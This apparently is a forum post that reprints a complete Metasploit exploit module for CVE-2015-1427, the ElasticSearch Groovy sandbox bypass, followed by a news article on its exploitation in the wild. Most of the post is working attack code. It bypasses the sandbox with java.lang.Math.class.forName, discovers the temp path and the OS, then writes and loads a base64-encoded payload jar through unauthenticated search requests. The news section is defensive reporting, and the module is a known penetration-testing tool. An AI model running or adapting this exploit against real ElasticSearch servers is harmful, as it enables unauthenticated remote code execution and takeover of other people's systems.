Search the Community

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'ElasticSearch Search Groovy Sandbox Bypass', 'Description' => %q{ This module exploits a remote command execution (RCE) vulnerability in ElasticSearch, exploitable by default on ElasticSearch prior to 1.4.3. The bug is found in the REST API, which does not require authentication, where the search function allows groovy code execution and its sandbox can be bypassed using java.lang.Math.class.forName to reference arbitrary classes. It can be used to execute arbitrary Java code. This module has been tested successfully on ElasticSearch 1.4.2 on Ubuntu Server 12.04. }, 'Author' => [ 'Cameron Morris', # Vulnerability discovery 'Darren Martyn', # Public Exploit 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2015-1427'], ['URL', 'https://jordan-wright.github.io/blog/2015/03/08/elasticsearch-rce-vulnerability-cve-2015-1427/'], ['URL', 'https://github.com/XiphosResearch/exploits/tree/master/ElasticSearch'], ['URL', 'http://drops.wooyun.org/papers/5107'] ], 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ ['ElasticSearch 1.4.2', {}] ], 'DisclosureDate' => 'Feb 11 2015', 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(9200), OptString.new('TARGETURI', [true, 'The path to the ElasticSearch REST API', "/"]) ], self.class) end def check result = Exploit::CheckCode::Safe if vulnerable? result = Exploit::CheckCode::Vulnerable end result end def exploit print_status("#{peer} - Checking vulnerability...") unless vulnerable? fail_with(Failure::Unknown, "#{peer} - Java has not been executed, aborting...") end print_status("#{peer} - Discovering TEMP path...") res = execute(java_tmp_dir) tmp_dir = parse_result(res) if tmp_dir.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify TEMP path...") else print_good("#{peer} - TEMP path on '#{tmp_dir}'") end print_status("#{peer} - Discovering remote OS...") res = execute(java_os) os = parse_result(res) if os.nil? fail_with(Failure::Unknown, "#{peer} - Could not identify remote OS...") else print_good("#{peer} - Remote OS is '#{os}'") end if os =~ /win/i tmp_file = "#{tmp_dir}#{rand_text_alpha(4 + rand(4))}.jar" else tmp_file = File.join(tmp_dir, "#{rand_text_alpha(4 + rand(4))}.jar") end register_files_for_cleanup(tmp_file) print_status("#{peer} - Trying to load metasploit payload...") java = java_load_class(os, tmp_file) execute(java) end def vulnerable? java = 'java.lang.Math.class.forName("java.lang.Runtime")' vprint_status("#{peer} - Trying to get a reference to java.lang.Runtime...") res = execute(java) result = parse_result(res) if result.nil? vprint_status("#{peer} - no response to test") return false elsif result == 'class java.lang.Runtime' return true end false end def parse_result(res) unless res vprint_error("#{peer} - No response") return nil end unless res.code == 200 && res.body vprint_error("#{peer} - Target answered with HTTP code #{res.code} (with#{res.body ? '' : 'out'} a body)") return nil end begin json = JSON.parse(res.body.to_s) rescue JSON::ParserError return nil end begin result = json['hits']['hits'][0]['fields']['msf_result'] rescue return nil end result.is_a?(::Array) ? result.first : result end def java_tmp_dir 'java.lang.Math.class.forName("java.lang.System").getProperty("java.io.tmpdir")' end def java_os 'java.lang.Math.class.forName("java.lang.System").getProperty("os.name")' end def java_load_class(os, tmp_file) if os =~ /win/i tmp_file.gsub!(/\\/, '\\\\\\\\') end java = [ 'c=java.lang.Math.class.forName("java.io.FileOutputStream");', 'b64=java.lang.Math.class.forName("sun.misc.BASE64Decoder");', "i=c.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\");", 'b64_i=b64.newInstance();', "i.write(b64_i.decodeBuffer(\"#{Rex::Text.encode_base64(payload.encoded)}\"));", 'loader_class=java.lang.Math.class.forName("java.net.URLClassLoader");', 'file_class=java.lang.Math.class.forName("java.io.File");', "file_url=file_class.getDeclaredConstructor(String.class).newInstance(\"#{tmp_file}\").toURI().toURL();", 'loader=loader_class.newInstance();', 'loader.addURL(file_url);', 'm=loader.loadClass(\'metasploit.Payload\');', 'm.main(null);' ] java.join end def execute(java, timeout = 20) payload = { "size" => 1, "query" => { "filtered" => { "query" => { "match_all" => {} } } }, "script_fields" => { "msf_result" => { "script" => java } } } res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path.to_s, "_search"), 'method' => 'POST', 'data' => JSON.generate(payload) }, timeout) res end end Source

Attackers are targeting a patched remote code execution vulnerability in Elasticsearch that grants unauthenticated bad guys access through a buggy API. The flaw (CVE-2015-1427) within the world's number two enterprise search engine was patched last month. It relates, for folks at Mitre say, to the Groovy scripting engine in Elasticsearch before versions 1.3.8 and 1.4.3 in which sandbox protections could be bypassed, allowing the execution of arbitrary shell commands with a crafted script. The fixes disable Groovy sandboxing and dynamic script execution which ElasticSearch developer Clinton Gormley says is a "blow" to Elasticsearch. Texas hacker Jordan Wright (@jw_sec) explained the vulnerability reported by Cisco and Elasticsearch security bod Cameron Morris after he was targeted in attacks. In a post written to alert fellow users he says the patch could be reversed to find hints about how to exploit the flaw. "This vulnerability was not heavily advertised, but it is absolutely critical," Wright says. "In fact, I had one of my own Elasticsearch instances compromised this way, showing this vulnerability is heavily being exploited in the wild. "I won’t provide a full proof-of-concept, but all the pieces are here ... it is pretty straightforward to run whatever commands you want." Developer David Davidson published overnight to GitHub what he says is a functioning proof of concept. There is a "tonne" of publicly-accessible Elasticsearch instances, Wright says. He recommends on Reddit that users check /tmp folders to ensure it is not accessible over the internet. "I've been seeing a ton of attempts to download skiddie DDoS bots via wget to /tmp in the past week or so," he says. Gormley says the company is in the long term examining ways to improve Expressions to become a more-powerful safe "mini-language". Source